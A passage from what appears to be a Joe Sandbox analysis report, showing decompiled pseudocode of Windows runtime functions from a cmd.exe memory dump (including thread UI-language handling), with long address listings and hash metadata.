										_t309 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t309 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t293) {
											__eflags =  *(_t309 + 0x1c);
											if( *(_t309 + 0x1c) == 0) {
												L106:
												_t329 = E03C02AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
												_v32 = _t329;
												__eflags = _t329 - 0xc0000100;
												if(_t329 != 0xc0000100) {
													goto L69;
												} else {
													_t321 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t251 = E03BE6600( *(_t309 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t329 = E03C02C50(_t293, _a8, _t283, _a16, _a20, _a24, _t321);
											L76:
											_v32 = _t329;
											goto L69;
										}
									}
									goto L108;
								} else {
									E03BEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t329 = _a24;
									_t258 = E03C02AE4( &_v36, _a8, _t283, _a16, _a20, _t329);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E03C02C50(_v36, _a8, _t283, _a16, _a20, _t329, 1);
									}
									_v8 = _t321;
									E03C02ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t329;
					}
					L70:
					return E03C2D0D1(_t244);
				}
				L108:
			}





















































                                                                                                                                          0x03c02584
                                                                                                                                          0x03c02586
                                                                                                                                          0x03c02590
                                                                                                                                          0x03c02596
                                                                                                                                          0x03c02597
                                                                                                                                          0x03c02598
                                                                                                                                          0x03c02599
                                                                                                                                          0x03c0259e
                                                                                                                                          0x03c025a4
                                                                                                                                          0x03c025a9
                                                                                                                                          0x03c025ac
                                                                                                                                          0x03c025ae
                                                                                                                                          0x03c025b1
                                                                                                                                          0x03c025b2
                                                                                                                                          0x03c025b5
                                                                                                                                          0x03c025b8
                                                                                                                                          0x03c025bb
                                                                                                                                          0x03c025bc
                                                                                                                                          0x03c025bf
                                                                                                                                          0x03c025c2
                                                                                                                                          0x03c025c5
                                                                                                                                          0x03c025c6
                                                                                                                                          0x03c025cb
                                                                                                                                          0x03c025ce
                                                                                                                                          0x03c025d8
                                                                                                                                          0x03c025db
                                                                                                                                          0x03c025dd
                                                                                                                                          0x03c025de
                                                                                                                                          0x03c025e1
                                                                                                                                          0x03c025e3
                                                                                                                                          0x03c025e9
                                                                                                                                          0x03c026da
                                                                                                                                          0x03c026da
                                                                                                                                          0x03c026dd
                                                                                                                                          0x03c026e2
                                                                                                                                          0x03c45b56
                                                                                                                                          0x00000000
                                                                                                                                          0x03c026e8
                                                                                                                                          0x03c026f9
                                                                                                                                          0x03c026fb
                                                                                                                                          0x03c026fe
                                                                                                                                          0x03c02700
                                                                                                                                          0x03c45b60
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02706
                                                                                                                                          0x03c02706
                                                                                                                                          0x03c0270a
                                                                                                                                          0x03c0270a
                                                                                                                                          0x03c0270d
                                                                                                                                          0x03c02713
                                                                                                                                          0x03c02716
                                                                                                                                          0x03c02718
                                                                                                                                          0x03c0271c
                                                                                                                                          0x03c0271e
                                                                                                                                          0x03c45b6c
                                                                                                                                          0x03c45b6f
                                                                                                                                          0x03c45b7f
                                                                                                                                          0x03c45b89
                                                                                                                                          0x03c45b8e
                                                                                                                                          0x03c45b93
                                                                                                                                          0x03c45b96
                                                                                                                                          0x03c45b9c
                                                                                                                                          0x03c45ba0
                                                                                                                                          0x03c45ba3
                                                                                                                                          0x03c45bab
                                                                                                                                          0x03c45bb0
                                                                                                                                          0x03c45bb3
                                                                                                                                          0x03c45bb3
                                                                                                                                          0x03c45ba3
                                                                                                                                          0x03c02724
                                                                                                                                          0x03c02726
                                                                                                                                          0x03c02729
                                                                                                                                          0x03c0272c
                                                                                                                                          0x03c0279d
                                                                                                                                          0x03c0279d
                                                                                                                                          0x03c027a0
                                                                                                                                          0x03c027a2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0272e
                                                                                                                                          0x03c0272e
                                                                                                                                          0x03c02731
                                                                                                                                          0x03c02734
                                                                                                                                          0x03c02734
                                                                                                                                          0x03c02736
                                                                                                                                          0x03c45bc1
                                                                                                                                          0x03c45bc1
                                                                                                                                          0x03c45bc4
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45bca
                                                                                                                                          0x03c45bca
                                                                                                                                          0x03c45bcd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45bd3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45bd3
                                                                                                                                          0x03c45bcd
                                                                                                                                          0x03c0273c
                                                                                                                                          0x03c0273c
                                                                                                                                          0x03c02742
                                                                                                                                          0x03c02747
                                                                                                                                          0x03c0274a
                                                                                                                                          0x03c0274d
                                                                                                                                          0x03c02750
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02756
                                                                                                                                          0x03c02756
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02902
                                                                                                                                          0x03c02908
                                                                                                                                          0x03c0290b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02911
                                                                                                                                          0x03c0291c
                                                                                                                                          0x03c02921
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02921
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02880
                                                                                                                                          0x03c02887
                                                                                                                                          0x03c0288c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02805
                                                                                                                                          0x03c0280a
                                                                                                                                          0x03c02814
                                                                                                                                          0x03c02816
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0281e
                                                                                                                                          0x03c02821
                                                                                                                                          0x03c02823
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02829
                                                                                                                                          0x03c02829
                                                                                                                                          0x03c02831
                                                                                                                                          0x03c0283c
                                                                                                                                          0x03c0283e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0283e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0284e
                                                                                                                                          0x03c02850
                                                                                                                                          0x03c02851
                                                                                                                                          0x03c02854
                                                                                                                                          0x03c02857
                                                                                                                                          0x03c0285a
                                                                                                                                          0x03c0285c
                                                                                                                                          0x03c0285d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0275d
                                                                                                                                          0x03c02761
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02767
                                                                                                                                          0x03c0276e
                                                                                                                                          0x03c02773
                                                                                                                                          0x03c02773
                                                                                                                                          0x03c02776
                                                                                                                                          0x03c02778
                                                                                                                                          0x03c0277e
                                                                                                                                          0x03c0277e
                                                                                                                                          0x03c02781
                                                                                                                                          0x03c02781
                                                                                                                                          0x03c02783
                                                                                                                                          0x03c02784
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45bd8
                                                                                                                                          0x03c45bde
                                                                                                                                          0x03c45be4
                                                                                                                                          0x03c45be6
                                                                                                                                          0x03c45be8
                                                                                                                                          0x03c45be9
                                                                                                                                          0x03c45bee
                                                                                                                                          0x03c45bf8
                                                                                                                                          0x03c45bff
                                                                                                                                          0x03c45c01
                                                                                                                                          0x03c45c04
                                                                                                                                          0x03c45c07
                                                                                                                                          0x03c45c0b
                                                                                                                                          0x03c45c0d
                                                                                                                                          0x03c45c0d
                                                                                                                                          0x03c45c15
                                                                                                                                          0x03c45c18
                                                                                                                                          0x03c45c1b
                                                                                                                                          0x03c45c1b
                                                                                                                                          0x03c45c1e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c028c3
                                                                                                                                          0x03c028c8
                                                                                                                                          0x03c028d2
                                                                                                                                          0x03c028d4
                                                                                                                                          0x03c028d8
                                                                                                                                          0x03c028db
                                                                                                                                          0x03c45c26
                                                                                                                                          0x03c45c28
                                                                                                                                          0x03c45c2d
                                                                                                                                          0x03c45c2d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45c34
                                                                                                                                          0x03c45c36
                                                                                                                                          0x03c45c49
                                                                                                                                          0x03c45c4e
                                                                                                                                          0x03c45c54
                                                                                                                                          0x03c45c5b
                                                                                                                                          0x03c45c5d
                                                                                                                                          0x03c45c60
                                                                                                                                          0x03c02788
                                                                                                                                          0x03c02788
                                                                                                                                          0x03c0278b
                                                                                                                                          0x03c0278e
                                                                                                                                          0x03c0278e
                                                                                                                                          0x03c0278e
                                                                                                                                          0x03c02791
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02756
                                                                                                                                          0x03c02750
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02794
                                                                                                                                          0x03c02794
                                                                                                                                          0x03c02795
                                                                                                                                          0x03c02798
                                                                                                                                          0x03c02798
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02734
                                                                                                                                          0x03c0272c
                                                                                                                                          0x03c02700
                                                                                                                                          0x03c025ef
                                                                                                                                          0x03c025ef
                                                                                                                                          0x03c025ef
                                                                                                                                          0x03c025f2
                                                                                                                                          0x03c025f8
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c025fe
                                                                                                                                          0x00000000
                                                                                                                                          0x03c028e6
                                                                                                                                          0x03c028ec
                                                                                                                                          0x03c028ef
                                                                                                                                          0x03c028f5
                                                                                                                                          0x03c028f8
                                                                                                                                          0x03c028f8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c028f8
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02866
                                                                                                                                          0x03c02866
                                                                                                                                          0x03c02876
                                                                                                                                          0x03c02879
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c027e0
                                                                                                                                          0x03c027e7
                                                                                                                                          0x03c027e9
                                                                                                                                          0x03c027eb
                                                                                                                                          0x03c45afd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45afd
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02633
                                                                                                                                          0x03c02638
                                                                                                                                          0x03c0263b
                                                                                                                                          0x03c0263c
                                                                                                                                          0x03c0263e
                                                                                                                                          0x03c02640
                                                                                                                                          0x03c02642
                                                                                                                                          0x03c02647
                                                                                                                                          0x03c02649
                                                                                                                                          0x03c0264e
                                                                                                                                          0x03c02650
                                                                                                                                          0x03c02653
                                                                                                                                          0x03c02659
                                                                                                                                          0x03c026a2
                                                                                                                                          0x03c026a7
                                                                                                                                          0x03c026ac
                                                                                                                                          0x03c026b2
                                                                                                                                          0x03c45b11
                                                                                                                                          0x03c45b15
                                                                                                                                          0x03c45b17
                                                                                                                                          0x00000000
                                                                                                                                          0x03c026b8
                                                                                                                                          0x03c026b8
                                                                                                                                          0x03c026ba
                                                                                                                                          0x03c027a6
                                                                                                                                          0x03c027a6
                                                                                                                                          0x03c027a9
                                                                                                                                          0x03c027ab
                                                                                                                                          0x03c027b9
                                                                                                                                          0x03c027b9
                                                                                                                                          0x03c027be
                                                                                                                                          0x03c027c1
                                                                                                                                          0x03c027c3
                                                                                                                                          0x03c027c5
                                                                                                                                          0x03c027c7
                                                                                                                                          0x03c45c74
                                                                                                                                          0x03c45c79
                                                                                                                                          0x03c45c79
                                                                                                                                          0x03c027c7
                                                                                                                                          0x00000000
                                                                                                                                          0x03c026c0
                                                                                                                                          0x03c026c0
                                                                                                                                          0x03c026c3
                                                                                                                                          0x03c026c6
                                                                                                                                          0x03c026c6
                                                                                                                                          0x03c026c9
                                                                                                                                          0x03c026c9
                                                                                                                                          0x00000000
                                                                                                                                          0x03c026c9
                                                                                                                                          0x03c026ba
                                                                                                                                          0x03c0265b
                                                                                                                                          0x03c0265b
                                                                                                                                          0x03c0265e
                                                                                                                                          0x03c02667
                                                                                                                                          0x03c0266d
                                                                                                                                          0x03c02677
                                                                                                                                          0x03c0267c
                                                                                                                                          0x03c0267f
                                                                                                                                          0x03c02681
                                                                                                                                          0x03c45b49
                                                                                                                                          0x03c45b4e
                                                                                                                                          0x03c027cd
                                                                                                                                          0x03c027d0
                                                                                                                                          0x03c027d1
                                                                                                                                          0x03c027d2
                                                                                                                                          0x03c027d4
                                                                                                                                          0x03c027dd
                                                                                                                                          0x03c02687
                                                                                                                                          0x03c02687
                                                                                                                                          0x03c0268a
                                                                                                                                          0x03c0268b
                                                                                                                                          0x03c0268e
                                                                                                                                          0x03c0268f
                                                                                                                                          0x03c02691
                                                                                                                                          0x03c02696
                                                                                                                                          0x03c02698
                                                                                                                                          0x03c0269d
                                                                                                                                          0x03c0269f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0269f
                                                                                                                                          0x03c02681
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02846
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02605
                                                                                                                                          0x03c0260a
                                                                                                                                          0x03c0260c
                                                                                                                                          0x03c02611
                                                                                                                                          0x03c02616
                                                                                                                                          0x03c02619
                                                                                                                                          0x03c02619
                                                                                                                                          0x03c0261e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02624
                                                                                                                                          0x03c02627
                                                                                                                                          0x03c02627
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45b1f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02894
                                                                                                                                          0x03c0289b
                                                                                                                                          0x03c0289d
                                                                                                                                          0x03c028a1
                                                                                                                                          0x03c45b2b
                                                                                                                                          0x03c45b2e
                                                                                                                                          0x03c45b2e
                                                                                                                                          0x03c028a7
                                                                                                                                          0x03c028a9
                                                                                                                                          0x03c45b04
                                                                                                                                          0x03c45b09
                                                                                                                                          0x03c45b09
                                                                                                                                          0x03c45b09
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45b35
                                                                                                                                          0x03c45b3c
                                                                                                                                          0x03c028fb
                                                                                                                                          0x03c028fb
                                                                                                                                          0x03c026cc
                                                                                                                                          0x03c026cc
                                                                                                                                          0x03c026d0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c026d2
                                                                                                                                          0x03c026d2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c026d2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c025fe
                                                                                                                                          0x03c0292d
                                                                                                                                          0x03c02930
                                                                                                                                          0x03c02935
                                                                                                                                          0x03c02937
                                                                                                                                          0x03c0293e
                                                                                                                                          0x03c0293f
                                                                                                                                          0x03c02942
                                                                                                                                          0x03c0294f
                                                                                                                                          0x03c02954
                                                                                                                                          0x03c02962
                                                                                                                                          0x03c02963
                                                                                                                                          0x03c0296b
                                                                                                                                          0x03c0296e
                                                                                                                                          0x03c0296f
                                                                                                                                          0x03c02972
                                                                                                                                          0x03c02973
                                                                                                                                          0x03c02977
                                                                                                                                          0x03c0297a
                                                                                                                                          0x03c0297b
                                                                                                                                          0x03c0297d
                                                                                                                                          0x03c0297e
                                                                                                                                          0x03c0297f
                                                                                                                                          0x03c02980
                                                                                                                                          0x03c02981
                                                                                                                                          0x03c02982
                                                                                                                                          0x03c02983
                                                                                                                                          0x03c02984
                                                                                                                                          0x03c02985
                                                                                                                                          0x03c02986
                                                                                                                                          0x03c02987
                                                                                                                                          0x03c02988
                                                                                                                                          0x03c02989
                                                                                                                                          0x03c0298a
                                                                                                                                          0x03c0298b
                                                                                                                                          0x03c0298c
                                                                                                                                          0x03c0298d
                                                                                                                                          0x03c0298e
                                                                                                                                          0x03c0298f
                                                                                                                                          0x03c02990
                                                                                                                                          0x03c02992
                                                                                                                                          0x03c02997
                                                                                                                                          0x03c029a3
                                                                                                                                          0x03c029a6
                                                                                                                                          0x03c029ab
                                                                                                                                          0x03c029ad
                                                                                                                                          0x03c029b0
                                                                                                                                          0x03c029b2
                                                                                                                                          0x03c45c80
                                                                                                                                          0x03c029b8
                                                                                                                                          0x03c029b8
                                                                                                                                          0x03c029bb
                                                                                                                                          0x03c029c0
                                                                                                                                          0x03c029c5
                                                                                                                                          0x03c029c6
                                                                                                                                          0x03c029c6
                                                                                                                                          0x03c029c9
                                                                                                                                          0x03c029cb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c029cd
                                                                                                                                          0x03c029d0
                                                                                                                                          0x03c029d9
                                                                                                                                          0x03c029db
                                                                                                                                          0x03c029dd
                                                                                                                                          0x03c02a7f
                                                                                                                                          0x03c02a84
                                                                                                                                          0x03c02a87
                                                                                                                                          0x03c02a89
                                                                                                                                          0x03c45ca1
                                                                                                                                          0x03c45ca3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02a8f
                                                                                                                                          0x03c02a8f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02a8f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c029e3
                                                                                                                                          0x03c029e3
                                                                                                                                          0x03c029e3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c029e3
                                                                                                                                          0x03c029dd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c029db
                                                                                                                                          0x03c029e6
                                                                                                                                          0x03c029e9
                                                                                                                                          0x03c029eb
                                                                                                                                          0x03c029ed
                                                                                                                                          0x03c029f3
                                                                                                                                          0x03c029f5
                                                                                                                                          0x03c029f8
                                                                                                                                          0x03c029fa
                                                                                                                                          0x03c02a97
                                                                                                                                          0x03c02a9a
                                                                                                                                          0x03c02a9d
                                                                                                                                          0x03c02add
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02a9f
                                                                                                                                          0x03c02aa2
                                                                                                                                          0x03c02aa5
                                                                                                                                          0x03c02aa8
                                                                                                                                          0x03c02aab
                                                                                                                                          0x03c45cab
                                                                                                                                          0x03c45caf
                                                                                                                                          0x03c45cc5
                                                                                                                                          0x03c45cda
                                                                                                                                          0x03c45cdc
                                                                                                                                          0x03c45cdf
                                                                                                                                          0x03c45ce5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45ceb
                                                                                                                                          0x03c45ced
                                                                                                                                          0x03c45cee
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45cee
                                                                                                                                          0x03c45cb1
                                                                                                                                          0x03c45cb4
                                                                                                                                          0x03c45cb9
                                                                                                                                          0x03c45cbb
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45cbd
                                                                                                                                          0x03c45cbd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c45cbd
                                                                                                                                          0x03c45cbb
                                                                                                                                          0x03c02ab1
                                                                                                                                          0x03c02ab1
                                                                                                                                          0x03c02ac4
                                                                                                                                          0x03c02ac6
                                                                                                                                          0x03c02ac6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02ac6
                                                                                                                                          0x03c02aab
                                                                                                                                          0x00000000
                                                                                                                                          0x03c02a00
                                                                                                                                          0x03c02a09
                                                                                                                                          0x03c02a0e
                                                                                                                                          0x03c02a21
                                                                                                                                          0x03c02a24
                                                                                                                                          0x03c02a35
                                                                                                                                          0x03c02a3a
                                                                                                                                          0x03c02a3d
                                                                                                                                          0x03c02a42
                                                                                                                                          0x03c02a59
                                                                                                                                          0x03c02a59
                                                                                                                                          0x03c02a5c
                                                                                                                                          0x03c02a5f
                                                                                                                                          0x03c02a5f
                                                                                                                                          0x03c029fa
                                                                                                                                          0x03c029f3
                                                                                                                                          0x03c02a64
                                                                                                                                          0x03c02a64
                                                                                                                                          0x03c02a6b
                                                                                                                                          0x03c02a6b
                                                                                                                                          0x03c02a6d
                                                                                                                                          0x03c02a72
                                                                                                                                          0x03c02a72
                                                                                                                                          0x00000000

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PATH
                                                                                                                                          • API String ID: 0-1036084923
                                                                                                                                          • Opcode ID: 9964c866ccc056ca9a30cfc5c2a539b040c897f5dc16e59f8a1e0b4c2f4fc221
                                                                                                                                          • Instruction ID: 96e004f3d4bf6f20898ff9a7e7c2817d537e600063aaf19f2756b631c307cddb
                                                                                                                                          • Opcode Fuzzy Hash: 9964c866ccc056ca9a30cfc5c2a539b040c897f5dc16e59f8a1e0b4c2f4fc221
                                                                                                                                          • Instruction Fuzzy Hash: 3EC1ACB5E10259AFCB24DFA9C884BBEF7B5FF48700F594429E901EB290D734A941DB60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                          			E03C0FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E03BEEEF0(0x3cc7b60);
					_t134 =  *0x3cc7b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3cc7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3cc7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03BE6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E03BE76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03C78938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E03BDB150();
													}
													_t116 = E03C76D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E03BE75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3cc8638; // 0x3474a78
																	_t122 = L03BE38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E03BE76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E03BE76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L03C0FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L03BE70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E03C0FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E03C0FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E03C0FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E03C0FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E03C0FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
